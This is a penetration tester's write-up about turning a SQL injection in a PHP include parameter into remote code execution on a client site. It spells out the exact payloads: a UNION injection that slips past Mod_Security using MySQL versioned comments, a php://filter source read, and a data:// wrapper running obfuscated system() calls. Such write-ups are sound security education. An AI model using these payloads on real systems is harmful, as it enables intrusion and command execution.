SQL injection to RCE

Efren Diaz
Oct 3, 2019 · 4 min read
Image for post
Image for post

In the next lines I will expose a case that I experimented some days ago working in a penetration testing for one of our customers at Open Data Security, in my opinion was interest how I needed concatenate a few factors to get the RCE.

For obvious reasons, some customer data will be anonymized.

Doing a directory fuzzing, I found a folder with a php file inside:

https://customer.com/php/load.php

When I tested the url I got a php Warning:

Image for post
Image for post

As we can see the app is trying to include an empty filename with a .php extension. Next thing that came to my mind was, maybe I could control the filename in a GET parameter, so I decided bruteforce some parameters. Before recurring to any scripts I thought I should test for common old school website modules parameters like “sec, section, mod, module, file, page,etc.” and to my surprise the “page” parameter threw a different error, a MySQL warning message:

Image for post
Image for post

Well, as we can see the include function continues in the same point with an empty filename, but we can see we got a MySQL error, then from here I tried guess that the aplication gets the required filename from a database and from here I tried the usually sql inyection:

https://customer.com/php/load.php?page=’ or ‘’=’

And I got the include warning message, but this time the filename was not empty, it was analytics.php, the first path string had a point, and the website css style was not loaded (now the links are not pink)

Image for post
Image for post

Well, at those time I was secure that the include() gets parts of the path from database and we need to try an union type SQL injection so that we control the path and try a Local File Inclusion.

In the first injection that I tried I got a 406 response, the website has the Mod_Security apache module enabled which unfortunately detects my injection BUT as some know, an outdated Mod_Security version can bypassed with MySQL comments in the injection string. I tried and it worked, with a 9 columns injected query:

https://customer.com/php/load.php?page=’ /*!50000union*/ select 1,2,3,4,5,6,7,8,9-- -
Image for post
Image for post

I didn’t find anywhere else throughout the web application, an upload form would allow to upload an image or any file extension with php code that wishfully, I could include to exploit the present Local File Inclusion, but as you can see in the previous image, I observed that I could manipulate the beginning of the path and that is great for my perspective because I know that I can try to use some php wrappers.

First I used “php://filter/convert.base64-encode/resource=” wrapper to read the index.php file:

https://customer.com/php/load.php?page=’ /*!50000union*/ select 1,2,3,4,5,’../index’,7,8,’php://filter/convert.base64-encode/resource=.’ -- -

And voila, we got a base64 encoded string of the index.php source code

Image for post
Image for post

Ah this point all I want is to get an RCE so I first tried the input:// wrapper, but that didn’t work because the application concatenates the input with the rest of the path, and because of the mighty Mod_Security module the use nullbyte %00 was not possible. Then I decided to try with the data:// wrapper to send some php code that hopefully will execute:

https://customer.com/php/load.php?page=' /*!50000union*/ select 1,2,3,4,5,6,7,8,’data://text/plain,<?php echo system(“uname -a”);?>’-- -

And once again I got a Mod_Security 406 response blocking me. Thinking some I supposed that the problem was in the “system(“ string, and I went back to cook some php lines:

<?php
$a=”sy”;
$b=”stem”;
$c=$a.$b;
$c(“uname -a”);
?>

And finally the payload was:

https://customer.com/php/load.php?page=' /*!50000union*/ select 1,2,3,4,5,6,7,8,’data://text/plain,<?php $a=”sy”;$b=”stem”;$c=$a.$b; $c(“uname -a”);?>’ -- -

And the response with our command result:

Image for post
Image for post

Then finally got RCE !!! ^_^

Image for post

InfoSec Write-ups

A collection of write-ups from the best hackers in the…

Sign up for Infosec Writeups

By InfoSec Write-ups

Newsletter from Infosec Writeups Take a look

By signing up, you will create a Medium account if you don’t already have one. Review our Privacy Policy for more information about our privacy practices.

Check your inbox
Medium sent you an email at to complete your subscription.

Efren Diaz

Written by

Security Analyst

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew

Efren Diaz

Written by

Security Analyst

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew

Medium is an open platform where 170 million readers come to find insightful and dynamic thinking. Here, expert and undiscovered voices alike dive into the heart of any topic and bring new ideas to the surface. Learn more

Follow the writers, publications, and topics that matter to you, and you’ll see them on your homepage and in your inbox. Explore

If you have a story to tell, knowledge to share, or a perspective to offer — welcome home. It’s easy and free to post your thinking on any topic. Write on Medium

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store